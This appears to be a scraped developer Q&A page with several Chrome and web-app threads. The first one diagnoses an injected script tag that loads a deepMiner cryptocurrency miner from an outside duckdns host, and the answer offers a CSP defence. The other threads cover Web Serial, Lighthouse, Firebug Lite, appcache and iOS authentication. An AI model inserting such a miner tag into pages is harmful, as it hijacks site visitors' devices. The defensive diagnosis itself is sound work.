what is deepminer.min.js that suddenly shows up in web app? - google-chrome

What is deepMiner.min.js that suddenly shows up in my web app? From Chrome developer tools I can see it tried to load the file for 25 seconds, but failed.
https://jhondi33.duckdns.org:7777/deepMiner.min.js
The file is not explicitly included in the web app.
In Microsoft Edge developer tools, it always shows as loaded from cache, even if the cache is disabled.
UPDATE
When running the web app from my local machine, the file does not show up in Chrome developer tools. Is this related to the web hosting? But the web app is served over HTTPS.
The following is inserted into the web page, which is dynamically generated (not static):
<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>

It appears to be a cryptocurrency miner that can be disguised as something innocuous. It got there because the web page has been hijacked and the script tag injected into it. See this similar GitHub issue: DeepMiner. Update the hosting and DNS credentials.
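Beyond cleaning up the compromised hosting, a defence-in-depth sketch (not specific to your stack; the Node.js handler below is purely illustrative): a Content-Security-Policy that only allows scripts from your own origin makes the browser refuse to run an injected tag like the one above, even if the markup gets tampered with again.

// Sketch: serve the dynamically generated page with a CSP header that only
// allows scripts from the page's own origin, so an injected
// <script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"> tag is blocked.
// The server framework and page content here are illustrative.
const http = require('http');

http.createServer((req, res) => {
  res.setHeader('Content-Security-Policy', "script-src 'self'");
  res.setHeader('Content-Type', 'text/html');
  res.end('<!DOCTYPE html><html><body><h1>app content</h1></body></html>');
}).listen(3000);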

Related

Chrome Web Serial API not working in VueJs Web app

I'm developing an enterprise web app with Vue.js, and I would like to use the Web Serial API in Chrome. On the Linux machine that I'm developing on, I went to the Chrome flag chrome://flags/#enable-experimental-web-platform-features and enabled it. Then I did console.log('serial' in navigator) and it returned true, meaning that the flag is enabled. All is good so far.
So I went and did the same thing on the corporate computer I need to be using (running Windows 10). I enabled the flag in Chrome, restarted it, and ran console.log('serial' in navigator) on the tab running the web app, but it returns false, which is bad because I need it to be true. But when I run that code on a different tab, it returns true. How could my web app be changing the navigator? So I can't use the Web Serial API on the one computer that needs it, and I don't know why.
Any help is appreciated.
UPDATED. The problem is not specific to Vue.js; you need to run the script from a secure context, either localhost or an SSL-secured domain. These security concerns are covered in this draft: https://wicg.github.io/serial/#security.
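A minimal sketch of the check described above (the function name and baud rate are illustrative):

// Sketch: verify the page runs in a secure context before using Web Serial.
// Chrome only exposes navigator.serial on https:// pages or on localhost.
async function connectSerial() {
  if (!window.isSecureContext || !('serial' in navigator)) {
    console.warn('Web Serial unavailable: serve the app over HTTPS or from localhost.');
    return;
  }
  // requestPort() must be triggered by a user gesture, e.g. a button click.
  const port = await navigator.serial.requestPort();
  await port.open({ baudRate: 9600 }); // baud rate is illustrative
  console.log('Serial port opened');
}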

Lighthouse report says my start_url isn't cached

Having run a Lighthouse report on my budding PWA, the report tells me that:
User will not be prompted to Install the Web App. Failures:
Manifest start_url is not cached by a Service Worker.
But it is! I can SEE it in the cache in the "Application" tab of Chrome's F12 tools.
I can confirm that the entry in manifest.json is correct too, as the "App Manifest" area in the F12 tools shows it.
I have tried changing it to work with just a basic HTML-only page and get the same issue in the report. I have also tried changing the URL to just / but there is no change in the Lighthouse report.
What am I doing wrong?
This was due to a "buggy" Lighthouse. It's being constantly updated and improved, and it no longer reports my start_url as being problematic.
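For reference, a minimal service worker sketch that precaches the start_url (assumed here to be "/"; the cache name and file list are illustrative) is roughly what the audit is looking for:

// sw.js - minimal sketch; cache name and precache list are illustrative.
const CACHE = 'pwa-cache-v1';
const PRECACHE = ['/', '/index.html', '/manifest.json'];

self.addEventListener('install', event => {
  // Cache the start_url ('/') so the installability audit can find it.
  event.waitUntil(caches.open(CACHE).then(cache => cache.addAll(PRECACHE)));
});

self.addEventListener('fetch', event => {
  // Answer requests from the cache first, falling back to the network.
  event.respondWith(
    caches.match(event.request).then(cached => cached || fetch(event.request))
  );
});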
Another issue I came across that was driving me mental was Lighthouse reporting that the site was using HTTP/1.1 (with no compression), while various online resources showed it was using HTTP/2 (with compression); IIS 10 automatically serves HTTP/2 if the client supports it. It turns out that my antivirus was intercepting HTTPS traffic; as soon as I turned off HTTPS threat detection, Lighthouse reported HTTP/2 with compression.

FireBug in Chrome doesn't show up on local websites

When I right-click on a local HTML page and select "Inspect with FireBug Lite", nothing happens... On regular online sites it works, except for "https://chrome.google.com/webstore/category/apps".
Has anyone had the same experience? I have the latest version of the extension (but it's from 2011 :/)
UPDATE: on some local sites it does show! On two web apps (PHP, Rails) it did work, but on a few static HTML files I tried it didn't...
Apparently this is normal...:
It doesn't work on local pages
If by "local pages" you mean files accessed via "file:///" protocol then yes, Firebug Lite doesn't work with "file:///" protocol. This is a JavaScript security restriction to prevent malicious web pages from accessing files in your your machine. Also, please note that the while you can load a "local page" in the browser (it will render properly) it will NOT behave exactly the same as when hosted in a web server.
Solution:
You can solve this problem by loading your page from a web server installed on your machine, so you can access those local files through "http://" addresses. This is the best solution: it is safer, and you'll get the most out of what Firebug Lite can give you. I recommend Apache HTTP Server, but you can use any server (IIS, for example).
Which exact URL are you visiting? Is it an internal Chrome page (like "chrome://downloads/"), or some page related to Google Chrome extensions ("https://chrome.google.com/extensions/")?
Google Chrome won't allow content scripts (required by Firebug Lite) to run on such pages. The problem is that Chrome informs neither the user nor the extension about it. In other words, there is no way for Firebug Lite to know whether the content script was loaded, so we worked around this by sniffing the URL, detecting when you visit URLs that begin with "chrome://" or "https://chrome.google.com/extensions/", and alerting users in such cases.
You have a few options to fix this.
One is to use Mozilla Firefox.
Second, install a web server on your system. Try WAMP or XAMPP. Once installed, store all your web pages and HTML files in the root folder of the web server you just created (for XAMPP that is C:\xampp\htdocs). Then navigate to the locally stored pages in your web browser by going to "127.0.0.1/index.html" or "localhost/index.html".
Now you can use Firebug-Lite for Google Chrome on local files.
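If you'd rather not install a full WAMP/XAMPP stack, a minimal static file server sketch (assuming Node.js is installed; the port and default file name are arbitrary) achieves the same thing:

// server.js - minimal static file server sketch. Run with: node server.js
// then open http://localhost:8080/index.html
const http = require('http');
const fs = require('fs');
const path = require('path');

const root = process.cwd(); // serve files from the folder the script is started in

http.createServer((req, res) => {
  // Strip the query string and map the URL onto a file under the root folder.
  const urlPath = decodeURIComponent(req.url.split('?')[0]);
  const filePath = path.join(root, urlPath === '/' ? 'index.html' : urlPath);

  fs.readFile(filePath, (err, data) => {
    if (err) {
      res.writeHead(404);
      res.end('Not found');
    } else {
      res.writeHead(200);
      res.end(data);
    }
  });
}).listen(8080, () => console.log('Serving ' + root + ' at http://localhost:8080'));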

Appcache manifest downloads all files but still unable to access offline unless they have been accessed online

I have successfully created an appcache manifest that downloads all of the website content. I have checked this through Chrome dev tools and it's all working.
The issue I am having now is that even though the entire website has been cached, I am unable to access the cached pages when offline unless I have already accessed them online.
I am using Apache and accessing the website via an iPad using safari browser.
I have an idea that this may be due to the server not allowing access to cached pages unless they had been accessed online as some kind of security measure.
Any ideas?
If your files are PHP or ASP, this will not work.
They need to be JavaScript, HTML, images, or other files that can run locally; the browser can cache and replay static responses, but it cannot execute server-side code offline.
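For illustration, a cache.manifest sketch that lists only static assets (the file names are hypothetical) and is referenced from the page with <html manifest="cache.manifest">:

CACHE MANIFEST
# v1 - list only static files; server-side pages (PHP/ASP) cannot run offline

CACHE:
index.html
styles.css
app.js
logo.png

NETWORK:
*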

Unable to fetch iOS webapp files on manifest update. 401 unauthorized

I have an HTML5 web app which runs perfectly when served via IIS without authentication.
It is using a cache.manifest file.
Both when running in Safari and when run as an "add to homescreen" fullscreen app, the app updates once I update the manifest file on the server.
When I turn on authentication on all files except the cache.manifest, I only see the update when running it in the Safari browser.
If I add it to the homescreen, I am not able to make the app update the cache.
If I Wireshark the traffic on the server, I can see the manifest file is fetched without problems, but all the files in the manifest file hit a 401 Unauthorized error.
Any idea how I can fix this? Running it in the Safari browser works.
Any help is highly appreciated.
Safari is much more aware of HTTP Basic Auth, but web.app (the home screen web app handler, which is basically a UIWebView wrapper) isn't as full-featured and doesn't appear to support basic auth.
It seems you may need to work around this with either a server-side solution that appends an authentication key to the filename (such as application.css?longhexkey) to bypass basic auth, or a more traditional login form (which may require significant changes to your app).
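A rough sketch of the first workaround, assuming a Node.js server and a hypothetical shared key (SECRET_KEY and the asset list are made up); the real server would still need to validate the key before serving each asset:

// Sketch: generate a cache.manifest whose entries carry an authentication key
// in the query string, so the home-screen app can fetch them without Basic Auth.
// SECRET_KEY and the asset list are hypothetical.
const SECRET_KEY = 'longhexkey';
const assets = ['index.html', 'application.css', 'application.js'];

function buildManifest() {
  const entries = assets.map(f => f + '?key=' + SECRET_KEY).join('\n');
  return 'CACHE MANIFEST\n# v1\n\nCACHE:\n' + entries + '\n\nNETWORK:\n*\n';
}

console.log(buildManifest());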
Same issue on Sencha forums: Unanswered: Forcing re-authentication after offline usage on iOS devices?